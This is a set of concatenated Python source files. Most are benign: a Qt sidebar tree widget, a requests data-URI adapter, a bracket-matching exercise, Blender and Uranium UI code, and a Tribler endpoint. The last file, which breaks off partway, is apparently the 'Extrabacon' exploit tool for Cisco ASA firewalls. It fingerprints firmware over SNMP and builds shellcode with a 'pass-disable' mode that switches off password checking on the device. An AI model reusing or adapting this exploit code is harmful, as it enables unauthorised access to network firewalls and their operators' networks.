class TreeWidget(QtWidgets.QTreeWidget):
itemDropped = QtCore.Signal(object)
itemRenamed = QtCore.Signal(str, str)
itemSelectionChanged = QtCore.Signal()
def __init__(self, *args):
super(TreeWidget, self).__init__(*args)
self._dpi = 1
self._data = []
self._items = []
self._index = {}
self._locked = False
self._dataset = None
self._recursive = True
self._filterText = ""
self._rootVisible = False
self._iconsVisible = True
self._options = {
'field': 'path',
'separator': '/',
'recursive': True,
'autoRootPath': True,
'rootText': 'FOLDERS',
'sortBy': None,
'queries': [{'filters': [('type', 'is', 'Folder')]}]
}
self.itemExpanded.connect(self.update)
self.itemCollapsed.connect(self.update)
self.setDpi(1)
self.setAcceptDrops(True)
self.setHeaderHidden(True)
self.setFrameShape(QtWidgets.QFrame.NoFrame)
self.setSelectionMode(QtWidgets.QTreeWidget.ExtendedSelection)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
def filterText(self):
"""
Get the current filter text.
:rtype: bool
"""
return self._filterText
def setFilterText(self, text):
"""
Triggered when the search filter has changed.
:type text: str
"""
self._filterText = text.strip()
self.refreshFilter()
def refreshFilter(self):
"""Refresh the current item filter."""
items = self.items()
for item in items:
if self._filterText.lower() in item.text(0).lower():
item.setHidden(False)
for parent in item.parents():
parent.setHidden(False)
else:
item.setHidden(True)
def clear(self):
"""Clear all the items from the tree widget."""
self._items = []
self._index = {}
super(TreeWidget, self).clear()
def setRootVisible(self, visible):
"""
Set the root item visible.
:type visible: bool
"""
self._rootVisible = visible
self.refreshData()
def isRootVisible(self):
"""
Check if the root item is visible
:rtype: bool
"""
return self._rootVisible
def setIconsVisible(self, visible):
"""
Set all icons visible.
:type visible: bool
"""
self._iconsVisible = visible
self.refreshData()
def iconsVisible(self):
"""
Check if all the icons are visible.
:rtype: bool
"""
return self._iconsVisible
def selectionChanged(self, *args):
"""Triggered the current selection has changed."""
self.parent().search()
def setRecursive(self, enable):
"""
Set the search query on the dataset to be recursive.
:type enable: bool
"""
self._recursive = enable
self.parent().search()
def isRecursive(self):
"""
Get the recursive query enable state.
:rtype: bool
"""
return self._recursive
def sortBy(self):
"""
Get the sortby field.
:rtype: str
"""
return self._options.get('sortBy', [self.field()])
def field(self):
"""
Get the field.
:rtype: str
"""
return self._options.get('field', '')
def rootText(self):
"""
Get the root text.
:rtype: str
"""
return self._options.get('rootText')
def separator(self):
"""
Get the separator used in the fields to separate level values.
:rtype: str
"""
return self._options.get('separator', DEFAULT_SEPARATOR)
def _dataChanged(self):
"""Triggered when the data set has changed."""
pass
# data = collections.OrderedDict()
# queries = self._options.get("queries")
#
# items = self.dataset().findItems(queries)
#
# for item in items:
# itemData = item.itemData()
# value = itemData.get(self.field())
# data[value] = {'iconPath': itemData.get('iconPath')}
#
# if data:
# root = findRoot(data.keys(), separator=self.separator())
# self.setPaths(data, root=root)
def setLocked(self, locked):
"""
Set the widget items to read only mode.
:type locked: bool
:rtype: None
"""
self._locked = locked
def isLocked(self):
"""
Return True if the items are in read only mode
:rtype: bool
"""
return self._locked
def itemAt(self, pos):
"""
:type pos: QtGui.QPoint
:rtype: None or Folder
"""
index = self.indexAt(pos)
if not index.isValid():
return
item = self.itemFromIndex(index)
return item
def dropEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
if self.isLocked():
logger.debug("Folder is locked! Cannot accept drop!")
return
self.itemDropped.emit(event)
def dragMoveEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
mimeData = event.mimeData()
if mimeData.hasUrls():
event.accept()
else:
event.ignore()
item = self.itemAt(event.pos())
if item:
self.selectPaths([item.path()])
def dragEnterEvent(self, event):
"""
:type event: QtCore.QEvent
:rtype: None
"""
event.accept()
def selectItem(self, item):
"""
:type item: NavigationWidgetItem
:rtype: None
"""
self.selectPaths([item.path()])
def dpi(self):
"""
Return the dots per inch multiplier.
:rtype: float
"""
return self._dpi
def setDpi(self, dpi):
"""
Set the dots per inch multiplier.
:type dpi: float
:rtype: None
"""
self._dpi = dpi
width = 20 * dpi
height = 18 * dpi
self.setIndentation(9 * dpi)
self.setMinimumWidth(20 * dpi)
self.setIconSize(QtCore.QSize(width, height))
self.setStyleSheet("height: {height}px;".format(height=height))
def update(self, *args):
"""
:rtype: None
"""
for item in self.items():
item.update()
def items(self):
"""
Return a list of all the items in the tree widget.
:rtype: list[NavigationWidgetItem]
"""
items = self.findItems(
"*",
QtCore.Qt.MatchWildcard | QtCore.Qt.MatchRecursive
)
return items
def itemFromUrl(self, url):
"""
Return the item for the given url.
:type url: QtCore.QUrl
:rtype: NavigationWidgetItem
"""
for item in self.items():
if url == item.url():
return item
def itemFromPath(self, path):
"""
Return the item for the given path.
:type path: str
:rtype: NavigationWidgetItem
"""
return self._index.get(path)
def settings(self):
"""
Return a dictionary of the settings for this widget.
:rtype: dict
"""
settings = {}
scrollBar = self.verticalScrollBar()
settings["verticalScrollBar"] = {
"value": scrollBar.value()
}
scrollBar = self.horizontalScrollBar()
settings["horizontalScrollBar"] = {
"value": scrollBar.value()
}
for item in self.items():
itemSettings = item.settings()
if itemSettings:
settings[item.path()] = item.settings()
return settings
def setSettings(self, settings):
"""
Set the settings for this widget
:type settings: dict
"""
for path in sorted(settings.keys()):
s = settings.get(path, None)
self.setPathSettings(path, s)
scrollBarSettings = settings.get("verticalScrollBar", {})
value = scrollBarSettings.get("value")
if value:
self.verticalScrollBar().setValue(value)
scrollBarSettings = settings.get("horizontalScrollBar", {})
value = scrollBarSettings.get("value")
if value:
self.horizontalScrollBar().setValue(value)
self.setDpi(self.dpi())
def setPathSettings(self, path, settings):
"""
Show the context menu at the given position.
:type path: str
:type settings: dict
:rtype: None
"""
item = self.itemFromPath(path)
if item and settings:
item.setSettings(settings)
def showContextMenu(self, position):
"""
Show the context menu at the given position.
:type position: QtCore.QPoint
:rtype: None
"""
menu = self.createContextMenu()
menu.exec_(self.viewport().mapToGlobal(position))
def expandedItems(self):
"""
Return all the expanded items.
:rtype: list[NavigationWidgetItem]
"""
for item in self.items():
if self.isItemExpanded(item):
yield item
def expandedPaths(self):
"""
Return all the expanded paths.
:rtype: list[NavigationWidgetItem]
"""
for item in self.expandedItems():
yield item.url()
def setExpandedPaths(self, paths):
"""
Set the given paths to expanded.
:type paths: list[str]
"""
for item in self.items():
if item.url() in paths:
item.setExpanded(True)
def selectedItem(self):
"""
Return the last selected item
:rtype: SidebarWidgetItem
"""
path = self.selectedPath()
return self.itemFromPath(path)
def selectedPath(self):
"""
Return the last selected path
:rtype: str or None
"""
paths = self.selectedPaths()
if paths:
return paths[-1]
def selectedPaths(self):
"""
Return the paths that are selected.
:rtype: list[str]
"""
paths = []
items = self.selectedItems()
for item in items:
path = item.path()
paths.append(path)
return studiolibrary.normPaths(paths)
def selectPath(self, path):
"""
Select the given path
:type: str
:rtype: None
"""
self.selectPaths([path])
def selectPaths(self, paths):
"""
Select the items with the given paths.
:type paths: list[str]
:rtype: None
"""
paths = studiolibrary.normPaths(paths)
items = self.items()
for item in items:
if studiolibrary.normPath(item.path()) in paths:
item.setSelected(True)
else:
item.setSelected(False)
def selectUrl(self, url):
"""
Select the item with the given url.
:type url: str
:rtype: None
"""
items = self.items()
for item in items:
if item.url() == url:
item.setSelected(True)
else:
item.setSelected(False)
def selectedUrls(self):
"""
Return the urls for the selected items.
:rtype: list[str]
"""
urls = []
items = self.selectedItems()
for item in items:
urls.append(item.url())
return urls
def setPaths(self, *args, **kwargs):
"""
This method has been deprecated.
"""
logger.warning("This method has been deprecated!")
self.setData(*args, **kwargs)
def refreshData(self):
self.setData(self._data)
def setData(self, data, root="", split=None):
"""
Set the items to the given items.
:type data: list[str]
:type root: str
:type split: str
:rtype: None
"""
self._data = data
settings = self.settings()
self.blockSignals(True)
self.clear()
if not root:
root = findRoot(data.keys(), self.separator())
self.addPaths(data, root=root, split=split)
self.setSettings(settings)
self.blockSignals(False)
self.parent().search()
def addPaths(self, paths, root="", split=None):
"""
Set the given items as a flat list.
:type paths: list[str]
:type root: str or None
:type split: str or None
"""
data = pathsToDict(paths, root=root, separator=split)
self.createItems(data, split=split)
if isinstance(paths, dict):
self.setSettings(paths)
def createItems(self, data, split=None):
"""
Create the items from the given data dict
:type data: dict
:type split: str or None
:rtype: None
"""
split = split or DEFAULT_SEPARATOR
self._index = {}
for key in data:
root = split.join([key])
item = None
if self.isRootVisible():
text = key.split(split)
if text:
text = text[-1]
else:
text = key
item = SidebarWidgetItem(self)
item.setText(0, six.text_type(text))
item.setPath(root)
item.setExpanded(True)
self._index[root] = item
def _recursive(parent, children, split=None, root=""):
for text, val in sorted(children.items()):
if not parent:
parent = self
path = split.join([root, text])
path = studiolibrary.normPath(path)
child = SidebarWidgetItem(parent)
child.setText(0, six.text_type(text))
child.setPath(path)
self._index[path] = child
_recursive(child, val, split=split, root=path)
_recursive(item, data[key], split=split, root=root)
self.update()
self.refreshFilter()
class ExampleWindow(QtWidgets.QWidget):
def __init__(self, *args):
QtWidgets.QWidget.__init__(self, *args)
layout = QtWidgets.QVBoxLayout(self)
self.setLayout(layout)
self._lineEdit = QtWidgets.QLineEdit()
self._lineEdit.textChanged.connect(self.searchChanged)
self._treeWidget = TreeWidget(self)
self._slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self._slider.valueChanged.connect(self._valueChanged)
self._slider.setRange(50, 200)
self._slider.setValue(100)
self._slider.setFixedHeight(18)
layout.addWidget(self._slider)
layout.addWidget(self._lineEdit)
layout.addWidget(self._treeWidget)
self._treeWidget.itemClicked.connect(self.itemClicked)
self._treeWidget.itemSelectionChanged.connect(self.selectionChanged)
self.update()
def _valueChanged(self, value):
self.update()
def update(self):
import studiolibrary
value = self._slider.value()
value = value / 100.0
theme = studiolibrary.widgets.Theme()
theme.setDpi(value)
self._treeWidget.setDpi(value)
self._treeWidget.setStyleSheet(theme.styleSheet())
def setData(self, *args, **kwargs):
self._treeWidget.setData(*args, **kwargs)
def itemClicked(self):
print("ITEM CLICKED")
print(self._treeWidget.settings())
items = self._treeWidget.selectedItems()
for item in items:
print(item.path())
def selectionChanged(self, *args):
print("SELECTION CHANGED", args)
def searchChanged(self, text):
print("SEARCH CHANGED", text)
items = self._treeWidget.items()
t = time.time()
self._treeWidget.expandAll()
for item in items:
if text.lower() in item.text(0).lower():
item.setHidden(False)
for parent in item.parents():
parent.setHidden(False)
else:
item.setHidden(True)
print(time.time() - t)
def runTests():
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana'
]
assert findRoot(paths) == '/fruit'
paths = [
'/fruit/apple',
'/fruit/orange',
'/fruit/banana',
'/tesla/cars'
]
assert findRoot(paths) == ''
data = pathsToDict(paths)
assert 'fruit' in data
assert 'apple' in data.get('fruit')
assert 'orange' in data.get('fruit')
assert 'banana' in data.get('fruit')
assert 'cars' in data.get('tesla')
paths = [
'>tesla>car>modelS',
'>tesla>car>modelX',
'>tesla>car>model3',
]
assert findRoot(paths, separator='>') == '>tesla>car'
data = pathsToDict(paths, separator='>')
assert 'tesla' in data
assert 'modelS' in data.get('tesla').get('car')
assert 'modelX' in data.get('tesla').get('car')
assert 'model3' in data.get('tesla').get('car')
def showExampleWindow():
data = {
"P:/production/shared/anim": {
"text": "FOLDERS",
"bold": True,
"isExpanded": True,
"iconPath": "none",
"iconColor": "rgb(100, 100, 150)",
"textColor": "rgb(100, 100, 150, 150)"
},
"P:/production/shared/anim/walks/fast.anim": {},
"P:/production/shared/anim/walks/slow.anim": {},
"P:/production/shared/anim/rigs/prop.rig": {},
"P:/production/shared/anim/rigs/character.rig": {},
"Users/libraries/animation/Character/Boris/stressed.pose": {},
"Users/libraries/animation/Character/Boris/smile.pose": {},
"Users/libraries/animation/Character/Cornilous/normal.pose": {},
"Users/libraries/animation/Character/Cornilous/relaxed.pose": {},
"Users/libraries/animation/Character/Cornilous/surprised.pose": {},
"Users/libraries/animation/Character/Figaro/test.anim": {},
"Users/libraries/animation/Character/Figaro/anim/hiccup.anim": {},
"props/car/color/red": {},
"props/car/color/orange": {},
"props/car/color/yellow": {},
"props/plane/color/blue": {},
"props/plane/color/green": {},
"/": {},
"/Hello": {},
"/Hello/World": {},
"/Test/World": {},
"tags": {
"text": "TAGS",
"bold": True,
"isExpanded": True,
"iconPath": "none",
"iconColor": "rgb(100, 100, 150)",
"textColor": "rgb(100, 100, 150, 150)"
},
"tags/red": {
"iconColor": "rgb(200, 50, 50)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/orange": {
"bold": True,
"textColor": "rgb(250, 150, 50)",
"iconColor": "rgb(250, 150, 50)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/yellow": {
"iconColor": "rgb(250, 200, 0)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/blue": {
"iconColor": "rgb(50, 150, 250)",
"iconPath": "../../resource/icons/circle.png"
},
"tags/green": {
"iconColor": "rgb(100, 200, 0)",
"iconPath": "../../resource/icons/circle.png"
}
}
window = ExampleWindow(None)
window.setData(data)
window.show()
window.setGeometry(300, 300, 300, 600)
return window
if __name__ == "__main__":
with studioqt.app():
w = showExampleWindow()
|
krathjen/studiolibrary
|
src/studiolibrary/widgets/sidebarwidget/sidebarwidget.py
|
Python
|
lgpl-3.0
| 32,909
|
from email.utils import formatdate
from traceback import format_exc
from urllib import unquote as url_unquote
from requests import Response
from requests.adapters import BaseAdapter
from requests.exceptions import RequestException, InvalidURL
from requests.hooks import dispatch_hook
from binascii import a2b_base64
from StringIO import StringIO
class UnsupportedFeature(RequestException):
"""Adapter doesn't support this feature."""
class DataAdapter(BaseAdapter):
"""adapter for Data URIs"""
def send(self, request, stream=False, verify=None, cert=None, proxies=None,
timeout=None):
"""issue request"""
data = url_unquote(request.url[len('data:'):])
if ',' not in data:
raise InvalidURL('data URL missing comma')
mime, content = data.split(',', 1)
content = content.strip()
base64 = False
charset = None
while ';' in mime:
mime, encoding_spec = mime.rsplit(';', 1)
encoding_spec = encoding_spec.strip()
if encoding_spec == 'base64':
base64 = True
elif not encoding_spec.startswith('charset='):
raise InvalidURL(
'unrecognized encoding parameter: %r' % encoding_spec
)
else:
charset = encoding_spec[len('charset='):]
try:
if base64:
content = a2b_base64(content)
content_type = mime.strip()
if charset:
content_type += "; charset=" + charset
response = Response()
response.url = request.url
response.headers['Date'] = formatdate(timeval=None, localtime=True)
if request.method in ('GET', 'HEAD'):
response.status_code = 200
response.headers['Content-Length'] = len(content)
response.headers['Last-Modified'] = formatdate()
response.headers['Content-Type'] = content_type
if charset:
response.encoding = charset
response.raw = StringIO(str(content))
else:
response.status_code = 405
response.headers['Status'] = '405 Method Not Allowed'
except Exception:
response.status_code = 500
response.headers['Status'] = '500 Internal Server Error'
response.raw = StringIO(format_exc())
# context
response.request = request
response.connection = self
# hooks
response = dispatch_hook('response', request.hooks, response)
# streaming
if not stream:
response.content
return response
def close(self):
"""close connection (currently doesn't do anything)"""
|
jvantuyl/requests-data
|
requests_data/adapters.py
|
Python
|
lgpl-3.0
| 2,822
|
class tunel:
def __init__(self, tn_id, name=None, cnt=0):
self.tn_id = tn_id
if name:
self.name = name
else:
self.name = 'tunel '+str(tn_id)[1:]
self.cnt = cnt
class tunel_pool:
def __init__(self):
self.pool = {}
self.pool['t0'] = tunel('t0', 'main tunel', 1)
def join_tn(self, tn_id):
self.pool.setdefault(tn_id, tunel(tn_id=tn_id, cnt=0))
self.pool[tn_id].cnt += 1
return tn_id
def leave_tn(self, tn_id):
if tn_id in self.pool:
self.pool[tn_id].cnt -= 1
if not self.pool[tn_id].cnt:
self.pool.pop(tn_id)
def ch_tn(self, tn_id_from, tn_id_to):
self.join_tn(tn_id_to)
self.leave_tn(tn_id_from)
return tn_id_to
def chname_tn(self, tn_id, new_name):
if tn_id == 't0':
return False
self.pool[tn_id].name = new_name
return True
__all__ = [tunel, tunel_pool]
|
laxect/tellnet
|
tunel_struct.py
|
Python
|
lgpl-3.0
| 990
|
#!/usr/bin/env python3
import math
import os
import random
import re
import sys
# Complete the isBalanced function below.
def isBalanced(s):
opn = []
enc = []
enclosing = False
for c in s:
if '{' == c or '[' == c or '(' == c:
opn.append(c)
enclosing = False
elif '}' == c or ']' == c or ')' == c:
enc.append(c)
enclosing = True
if enclosing and len(opn) > 0 and len(enc) > 0:
t = opn[-1:][0]
if t == '{' and c == '}' or t == '[' and c == ']' or t == '(' and c == ')':
opn.pop()
enc.pop()
return 'NO' if opn or enc else 'YES'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
|
williamlagos/chess
|
solving/stacks/brackets.py
|
Python
|
lgpl-3.0
| 905
|
# Copyright (c) 2015 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
import inspect
from PyQt5.QtCore import pyqtProperty, pyqtSignal, QObject, QUrl, QCoreApplication, pyqtSlot
from PyQt5.QtQml import QJSValue
# from UM.FlameProfiler import pyqtSlot
from UM.i18n import i18nCatalog
class i18nCatalogProxy(QObject): # [CodeStyle: Ultimaker code style requires classes to start with a upper case. But i18n is lower case by convention.]
def __init__(self, parent = None):
super().__init__()
self._name = None
self._catalog = None
# Slightly hacky way of getting at the QML engine defined by QtApplication.
engine = QCoreApplication.instance()._engine
self._i18n_function = self._wrapFunction(engine, self, self._call_i18n)
self._i18nc_function = self._wrapFunction(engine, self, self._call_i18nc)
self._i18np_function = self._wrapFunction(engine, self, self._call_i18np)
self._i18ncp_function = self._wrapFunction(engine, self, self._call_i18ncp)
def setName(self, name):
if name != self._name:
self._catalog = i18nCatalog(name)
self.nameChanged.emit()
nameChanged = pyqtSignal()
@pyqtProperty(str, fset = setName, notify = nameChanged)
def name(self):
return self._name
@pyqtProperty(QJSValue, notify = nameChanged)
def i18n(self):
return self._i18n_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18nc(self):
return self._i18nc_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18np(self):
return self._i18np_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18ncp(self):
return self._i18ncp_function
@pyqtSlot(str, result = str)
def _call_i18n(self, message):
return self._catalog.i18n(message)
@pyqtSlot(str, str, result = str)
def _call_i18nc(self, context, message):
return self._catalog.i18nc(context, message)
@pyqtSlot(str, str, int, result = str)
def _call_i18np(self, single, multiple, counter):
return self._catalog.i18np(single, multiple, counter)
@pyqtSlot(str, str, str, int, result = str)
def _call_i18ncp(self, context, single, multiple, counter):
return self._catalog.i18ncp(context, single, multiple, counter)
## Wrap a function in a bit of a javascript to re-trigger a method call on signal emit.
#
# This slightly magical method wraps a Python method exposed to QML in a JavaScript
# closure with the same signature as the Python method. This allows the closure to be
# exposed as a QML property instead of a QML slot. Using a property for this allows us
# to add a notify signal to re-trigger the method execution. Due to the way notify
# signals are handled by QML, re-triggering the method only needs a signal emit.
#
# \param engine \type{QQmlEngine} The QML engine to use to evaluate JavaScript.
# \param this_object \type{QObject} The object to call the function on.
# \param function \type{Function} The function to call. Should be marked as pyqtSlot.
#
# \return \type{QJSValue} A JavaScript closure that when called calls the wrapper Python method.
#
# \note Currently, only functions taking a fixed list of positional arguments are supported.
#
# \todo Move this to a more generic place so more things can use it.
def _wrapFunction(self, engine, this_object, function):
# JavaScript code that wraps the Python method call in a closure
wrap_js = """function(this_object) {{
return function({args}) {{ return this_object.{function}({args}) }}
}}"""
# Get the function name and argument list.
function_name = function.__name__
function_args = inspect.getargspec(function)[0]
if function_args[0] == "self":
function_args = function_args[1:] # Drop "self" from argument list
# Replace arguments and function name with the proper values.
wrapped_function = wrap_js.format(function = function_name, args = ", ".join(function_args))
# Wrap the "this" object in a QML JSValue object.
this_jsvalue = engine.newQObject(this_object)
# Use the QML engine to evaluate the wrapped JS, then call that to retrieve the closure.
result = engine.evaluate(wrapped_function).call([this_jsvalue])
# Finally, return the resulting function.
return result
|
thopiekar/Uranium
|
UM/Qt/Bindings/i18nCatalogProxy.py
|
Python
|
lgpl-3.0
| 4,546
|
# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2020, 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on. If not, see <http://www.gnu.org/licenses/>.
from bpy.types import Panel, UIList, Mesh
from blenderbim.bim.ifc import IfcStore
from ifcopenshell.api.layer.data import Data
class BIM_PT_layers(Panel):
bl_label = "IFC Presentation Layers"
bl_idname = "BIM_PT_layers"
bl_options = {"DEFAULT_CLOSED"}
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "scene"
bl_parent_id = "BIM_PT_geometry_object"
@classmethod
def poll(cls, context):
return IfcStore.get_file()
def draw(self, context):
if not Data.is_loaded:
Data.load(IfcStore.get_file())
self.props = context.scene.BIMLayerProperties
row = self.layout.row(align=True)
row.label(text="{} Layers Found".format(len(Data.layers.keys())))
if self.props.is_editing:
row.operator("bim.add_presentation_layer", text="", icon="ADD")
row.operator("bim.disable_layer_editing_ui", text="", icon="CANCEL")
else:
row.operator("bim.load_layers", text="", icon="GREASEPENCIL")
if self.props.is_editing:
self.layout.template_list(
"BIM_UL_layers",
"",
self.props,
"layers",
self.props,
"active_layer_index",
)
if self.props.active_layer_id:
self.draw_editable_ui(context)
def draw_editable_ui(self, context):
for attribute in self.props.layer_attributes:
row = self.layout.row(align=True)
row.prop(attribute, "string_value", text=attribute.name)
if attribute.is_optional:
row.prop(attribute, "is_null", icon="RADIOBUT_OFF" if attribute.is_null else "RADIOBUT_ON", text="")
class BIM_UL_layers(UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname):
if item:
row = layout.row(align=True)
row.label(text=item.name)
if context.active_object and isinstance(context.active_object.data, Mesh):
mprops = context.active_object.data.BIMMeshProperties
if (
mprops.ifc_definition_id in Data.items
and item.ifc_definition_id in Data.items[mprops.ifc_definition_id]
):
op = row.operator("bim.unassign_presentation_layer", text="", icon="KEYFRAME_HLT", emboss=False)
op.layer = item.ifc_definition_id
else:
op = row.operator("bim.assign_presentation_layer", text="", icon="KEYFRAME", emboss=False)
op.layer = item.ifc_definition_id
row.operator("bim.disable_editing_layer", text="", icon="HIDE_OFF", emboss=False)
row.operator("bim.disable_editing_layer", text="", icon="FREEZE", emboss=False)
if context.scene.BIMLayerProperties.active_layer_id == item.ifc_definition_id:
row.operator("bim.edit_presentation_layer", text="", icon="CHECKMARK")
row.operator("bim.disable_editing_layer", text="", icon="CANCEL")
elif context.scene.BIMLayerProperties.active_layer_id:
row.operator("bim.remove_presentation_layer", text="", icon="X").layer = item.ifc_definition_id
else:
op = row.operator("bim.enable_editing_layer", text="", icon="GREASEPENCIL")
op.layer = item.ifc_definition_id
row.operator("bim.remove_presentation_layer", text="", icon="X").layer = item.ifc_definition_id
|
IfcOpenShell/IfcOpenShell
|
src/blenderbim/blenderbim/bim/module/layer/ui.py
|
Python
|
lgpl-3.0
| 4,363
|
from twisted.web import resource
from Tribler.Core.Modules.restapi.market.asks_bids_endpoint import AsksEndpoint, BidsEndpoint
from Tribler.Core.Modules.restapi.market.orders_endpoint import OrdersEndpoint
from Tribler.Core.Modules.restapi.market.transactions_endpoint import TransactionsEndpoint
class MarketEndpoint(resource.Resource):
"""
This class represents the root endpoint of the market community API where we trade reputation.
"""
def __init__(self, session):
resource.Resource.__init__(self)
self.session = session
child_handler_dict = {"asks": AsksEndpoint, "bids": BidsEndpoint, "transactions": TransactionsEndpoint,
"orders": OrdersEndpoint}
for path, child_cls in child_handler_dict.iteritems():
self.putChild(path, child_cls(self.session))
|
vandenheuvel/tribler
|
Tribler/Core/Modules/restapi/market_endpoint.py
|
Python
|
lgpl-3.0
| 851
|
#!/usr/bin/env python
import sys
import string
import subprocess
import binascii
import random
import datetime
sc_dir = "./shellcode"
vers_dir = "./versions"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
def run(self, exp):
super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconExecSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
self.parser.add_argument('--mode',
help='select mode of operation',
choices=["pass-disable", "pass-enable"],
required=True,
default=None)
self.parser.add_argument('--msg',
help='print success message on console of target (DO NOT USE)',
dest='msg',
action='store_true',
required=False,
default=False)
def run(self, exp):
super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
def setup_parser(self):
super(Extrabacon, self).setup_parser()
##
self.add_subcommand(ExtrabaconInfoSubcommand())
##
self.add_subcommand(ExtrabaconExecSubcommand())
##
##
def generate_touch(self):
return SNMP(version = self.params.version,
community = self.params.community,
PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
def fw_version_check(self, vers_string):
##
##
##
##
##
##
##
##
##
##
##
##
##
##
if vers_string == "Cisco Adaptive Security Appliance Version 8.0(2)":
return "asa802"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)":
return "asa803"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)6":
return "asa803-6"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)":
return "asa804"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)32":
return "asa804-32"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(5)":
return "asa805"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(1)":
return "asa821"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(2)":
return "asa822"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(3)":
return "asa823"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(4)":
return "asa824"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(5)":
return "asa825"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(1)":
return "asa831"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(2)":
return "asa832"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(1)":
return "asa841"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(2)":
return "asa842"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(3)":
return "asa843"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(4)":
return "asa844"
else:
return "unsupported"
##
##
##
def generate_runtime(self):
try:
f = open("%s/runtime.s" % vers_dir, 'w')
f.write("# this file auto-generated, do not touch\n")
f.write("\n")
f.write(".set commstr_len, %d\n" % len(self.params.community))
f.close()
except:
print "problem generating runtime.s file in versions!"
print sys.exc_info()[0]
sys.exit(1)
def post_touch(self, response):
##
##
values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
if not values:
return False
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
fw_uptime = values[1]
fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
print
print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
print
fw_name = values[2]
print "[+] firewall name is %s" % fw_name
print
fw_vers = self.fw_version_check(values[0])
if fw_vers != "unsupported":
print "[+] target is running %s, which is supported" % fw_vers
else:
print "[-] target is running %s, which is NOT supported" % values[0]
self.key_data = fw_vers ##
if self.params.verbose:
print 'Data stored in key file : %s' % self.key_data
##
##
return True
def load_vinfo(self):
self.vinfo = self.key_data.upper()
if self.params.verbose:
print 'Data stored in self.vinfo: %s' % self.vinfo
def report_key(self, key):
print "\nTo check the key file to see if it really contains what we're claiming:"
print "# cat %s" % self.get_key_file(key = key)
if self.key_data.lower() == "unsupported":
return
print "\nTo disable password checking on target:"
print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
print "\nTo enable password checking on target:"
print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
##
##
##
print
##
##
##
def build_shellcode(self):
try:
print "[+] ==============="
subp = subprocess.Popen("make %s" % self.key_data.lower(),
cwd=sc_dir,
shell=True)
retval = subp.wait()
print "[+] ==============="
except OSError, e:
print "problem (OSError) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
print "OSError: " + str(e)
sys.exit(1)
except Exception, e:
print "problem (Exception) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
print str(e)
sys.exit(1)
if retval != 0:
print "problem with generating shellcode"
return False
return True
##
##
##
def build_payload(self, sc):
payload = ""
if self.params.mode == "pass-disable":
payload += sc.payload_PMCHECK_DISABLE_byte
